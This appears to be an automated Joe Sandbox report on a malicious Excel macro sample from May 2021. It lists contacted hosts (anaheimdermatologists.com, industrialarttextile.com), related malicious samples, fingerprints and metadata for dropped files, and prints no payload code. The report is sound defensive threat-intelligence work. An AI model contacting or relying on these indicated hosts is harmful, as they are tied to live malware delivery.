                                                                                                                              https://login.windows.net/common/oauth2/authorizeFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/importsFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.aiFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.comFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ovisualuiapp.azurewebsites.net/pbiagave/FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://visio.uservoice.com/forums/368202-visio-on-devicesFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://directory.services.FF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://login.windows-ppe.net/common/oauth2/authorizeFF93F185-DDDE-40CB-B93D-25B41D52007D.0.drfalse
                                                                                                                                                        high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        192.185.5.2
                                                                                                                                                        anaheimdermatologists.comUnited States
                                                                                                                                                        46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                        192.254.233.89
                                                                                                                                                        industrialarttextile.comUnited States
                                                                                                                                                        46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                        Analysis ID:403883
                                                                                                                                                        Start date:04.05.2021
                                                                                                                                                        Start time:13:50:44
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 5m 28s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:light
                                                                                                                                                        Sample file name:statistic-2069354685.xlsm
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Run name:Potential for more IOCs and behavior
                                                                                                                                                        Number of analysed new started processes analysed:20
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal84.troj.expl.evad.winXLSM@5/14@2/2
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:Failed
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .xlsm
                                                                                                                                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                        • Attach to Office via COM
                                                                                                                                                        • Scroll down
                                                                                                                                                        • Close Viewer

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        No simulations

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        192.185.5.2statistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                                                                                                          statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                              statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                              statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                f.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  f.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                            diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                192.254.233.89statistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                    statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                        14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                          14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                                                                                                                                                                                            Domains

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                            industrialarttextile.comstatistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            anaheimdermatologists.comstatistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2

                                                                                                                                                                                                                            ASN

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                            UNIFIEDLAYER-AS-1USstatistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 162.241.169.22
                                                                                                                                                                                                                            ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.185.244
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 50.87.249.219
                                                                                                                                                                                                                            presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 50.87.249.219
                                                                                                                                                                                                                            GK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.21.136
                                                                                                                                                                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.20.98
                                                                                                                                                                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.20.98
                                                                                                                                                                                                                            4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 50.87.166.59
                                                                                                                                                                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 108.179.242.122
                                                                                                                                                                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 108.179.242.122
                                                                                                                                                                                                                            6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 162.241.24.47
                                                                                                                                                                                                                            DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 162.241.169.22
                                                                                                                                                                                                                            UNIFIEDLAYER-AS-1USstatistic-2067311372.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 162.241.169.22
                                                                                                                                                                                                                            ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.185.244
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 50.87.249.219
                                                                                                                                                                                                                            presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 50.87.249.219
                                                                                                                                                                                                                            GK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.21.136
                                                                                                                                                                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.20.98
                                                                                                                                                                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.20.98
                                                                                                                                                                                                                            4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 50.87.166.59
                                                                                                                                                                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 108.179.242.122
                                                                                                                                                                                                                            c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 108.179.242.122
                                                                                                                                                                                                                            6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 162.241.24.47
                                                                                                                                                                                                                            DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 162.241.169.22

                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            f97e137e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            e1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            MV RED SEA.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            MyUY1HeWNL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            IMG-WA7905432.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            Tree Top.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            PT6-1152.docGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            s.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            setup-lightshot.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            s.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89
                                                                                                                                                                                                                            pic05678063.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                            • 192.185.5.2
                                                                                                                                                                                                                            • 192.254.233.89

                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                            No context

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FF93F185-DDDE-40CB-B93D-25B41D52007D
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):134558
                                                                                                                                                                                                                            Entropy (8bit):5.368383673618733
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:vcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:UEQ9DQW+zPXO8
                                                                                                                                                                                                                            MD5:1AF31B16563C9C47ED947428C38A164A
                                                                                                                                                                                                                            SHA1:BEB0A89382165324D7932EA1FB1DF1AD80DE8215
                                                                                                                                                                                                                            SHA-256:370668FCBE3B57B21305936A219F7070452F8BF08088397141CE91DE7CE0EE34
                                                                                                                                                                                                                            SHA-512:5DDB575770FCA1FC8E37C4A0130FB2433D83DD97C8EA335E2E132425BBEB2D6614315C404E2E92E8243E39E2721B259DBA4FB9207726BCB74EE6EC84A3EA045A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T11:51:37">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\31381FA9.png
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):557
                                                                                                                                                                                                                            Entropy (8bit):7.343009301479381
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                                                                            MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                                                                            SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                                                                            SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                                                                            SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8E121C48.png
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):34787
                                                                                                                                                                                                                            Entropy (8bit):7.9883689087667955
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:XbyxVN2hP86XpVBxUmtCQHcQpKvtcFM/MoJ97bk3Ueu:m92hjPcQpWUot9Eg
                                                                                                                                                                                                                            MD5:2C5A59B7F30E5E41412EC22FDEA1DBB5
                                                                                                                                                                                                                            SHA1:9A64FB6A68683EEC580A881725DBD146E80D06B1
                                                                                                                                                                                                                            SHA-256:E872E66F60AE5651AE96A2C2A88D07B0D1C96CDDD45F787AB04237891AD4E8FB
                                                                                                                                                                                                                            SHA-512:2D494F44E1DA36794C3E707BF1173EE63E2CF3101E3B5EA60D71A194DA9A6A1EB6B9C166B7C1ACAA2D455B9C6413D0FEE40AD38972C076183EF167818D7E92EC
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                            Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>..{'.......".bA.6.6..o/3...:......b....{HBBz./........[..%yI.!>...}.^{.o.........^..R.......=..c..-Z.n]cc...W.^...........z..2.9s.<....?|...._j.&.....R.......K...\.V..ukS..sgKKKWWWkk._@s....<x.Q..t..1bt.5k.QG....,X0f..Y.T...............k..y..k..K6^....v.x}..p....vX.MK..5.....j...X....8...~......z.{.aJ.Q...{.._|...|.....{.ui..M.)^...I.....};>..[n...../^..hnn.t.^.}..S.Ly.3.q.W.v.i)d.....W.x=p.".d@k.(.y...kE..P......mH"F^...\q..v)....K...R...:O..i..G......?...!.....y.^..W.....:u...).c.j ..=....X......<..u.]w.7.H.;.GE*...x.;^..WM.8.....G..x.?.Z*....:F..~..k..f.%.kN {..}(.d..C.z...2.G....x...S*.^....<..?..o...ME`......s.9.{.......>;.5....o.T....,..I.....?...o.w..6../~..>.....S.i1.Q.)^..VIe.........~._../..G...!C......|..k]]]v.x..wt......=.Y0...Z.9......=t.....]{S.)^.Mm...p..m......M.6....r.L.6MT..3'M.4{.l~.P[h....Wtttx........#.OR.\.r.e@
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BDC82AA3.png
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                            File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8301
                                                                                                                                                                                                                            Entropy (8bit):7.970711494690041
                                                                                                                                                                                                                            Encrypted:false
